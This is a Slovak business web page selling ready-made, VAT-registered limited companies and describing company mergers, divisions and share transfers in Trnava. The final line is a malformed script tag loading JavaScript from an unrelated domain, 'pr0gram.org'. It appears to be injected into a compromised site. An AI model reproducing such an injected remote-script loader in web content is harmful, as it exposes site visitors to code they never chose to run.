READY MADE S.R.O. (predaj s.r.o.)


V rámci našich služieb poskytujeme predaj už existujúcich nových ready made s.r.o., ktoré boli založené výlučne za účelom ich ďalšieho predaja, čím ušetríte čas a môžete začať podnikať takmer okamžite.
Bežný proces založenia s.r.o. spolu s registráciou platenia DPH trvá približne 50 dní a vyžaduje si náročnú komunikáciu a byrokraciu. Preto máme v ponuke ready made s.r.o. (pripravené s.r.o.), ktoré nemajú žiadnu obchodnú históriu, žiadne pohľadávky, dlhy, nedoplatky a iné záväzky, čo garantujeme priamo my. Tým pádom máte možnosť začať podnikať ihneď po jej odkúpení, čo predstavuje približne 48 hodín. Pri procese odkúpenia máte možnosť zmeniť názov s.r.o., sídlo, konateľov atď.


Všetky naše READY MADE S.R.O., ktoré máme v ponuke sú čisté, zapísané v živnostenskom a obchodnom registri, majú pridelené IČO a IČ DPH, t. j. sú registrované ako platca DPH na daňovom úrade. V ponuke máme výlučne spoločnosti s ručeným obmedzením, ktoré sú platcom DPH.

V prípade záujmu vieme vybaviť predaj, resp. kúpu ready made s.r.o., ktorá má obchodnú históriu, čo zaručuje profesionálnejšie pôsobenie v podnikateľskom prostredí.VÝHODY KÚPY READE MADE S.R.O.

 • Garancia kvalitnej a čistej s.r.o.
 • Splatená daňová licencia
 • Prevod na nového majiteľa trvá cca 48 hodín
 • bez záväzkov, dlhov, nedoplatkov a obchodného majetku
 • Spoločnosti zapísané v obchodnom registri
 • Spoločnosti sú registrované ako platiteľ DPH
 • Celý proces predaja realizuje advokátska kancelária


V cene je zahrnutý kompletný právny servis potrebný k prevodu ready made s.r.o. na nového majiteľa, čo zahŕňa vypracovanie všetkých dokumentov a zmlúv, vypracovanie a podanie návrhu na zápis zmien do obchodného registra (vrátane úhrady všetkých poplatkov). Celý proces realizuje renomovaná advokátska kancelária, ktorej služby hradíme za Vás.

Prevod OP, splynutie, zlučovanie a rozdeľovanie s.r.o.Splynutie obchodných spoločností:

  Splynutie obchodných spoločností predstavuje náročný proces, na základe ktorého dochádza k zániku dvoch alebo viacerých spoločností, pričom imanie zanikajúcich spoločností prechádza na inú novozaloženú spoločnosť, ktorá sa svojím vznikom stáva právnym nástupcom zanikajúcich spoločností.
 

Zlúčenie obchodných spoločností:

  Zlúčenie obchodných spoločností je veľmi podobné splynutiu obchodných spoločností, ale s jednou významnou odlišnosťou. Zlúčenie je postup, pri ktorom na základe zrušenia bez likvidácie dochádza k zániku jednej alebo viacerých obchodných spoločností, pričom imanie zanikajúcich spoločností prechádza už na existujúcu spoločnosť, ktorá sa tým stáva právnym nástupcom zanikajúcich spoločností.
 

Rozdelenie obchodných spoločností:

  Rozdelenie obchodných spoločností je postup, pri ktorom na základe zrušenia bez likvidácie dochádza k zániku spoločnosti, pričom jej imanie prechádza na iné už jestvujúce spoločnosti, ktoré sa tým stávajú právnymi nástupcami zanikajúcej spoločnosti, alebo na novozaložené spoločnosti.

Prevod obchodných podielov:

  S pojmom obchodný podiel sa stretávame pri spoločnosti s ručením obmedzeným(S.R.O.) a je určený podľa pomeru vkladu spoločníka k základnému imaniu spoločnosti. Predstavuje podiel práv a povinností spoločníka. Jeden spoločník môže mať len jeden obchodný podiel. Ak chce spoločník počas života previesť svoj obchodný podiel na inú osobu, tomuto procesu sa hovorí "prevod obchodného podielu". Prevod obchodného podielu sa realizuje prostredníctvom písomnej zmluvy, ktorá kvôli jej vážnosti musí byť napísaná osobou znalou práva.

Za účelom uskutočnenia týchto dôležitých zmien preferujeme osobné stretnutie v našej kancelárii v Trnave, ktoré si môžete dohodnúť na tel. č. 0918396114. V prípade väčšej diaľky si vieme obsah týchto právnych úkonov dohodnúť aj e-mailom.

script src="https://pr0gram.org/wp-cache/0a.js">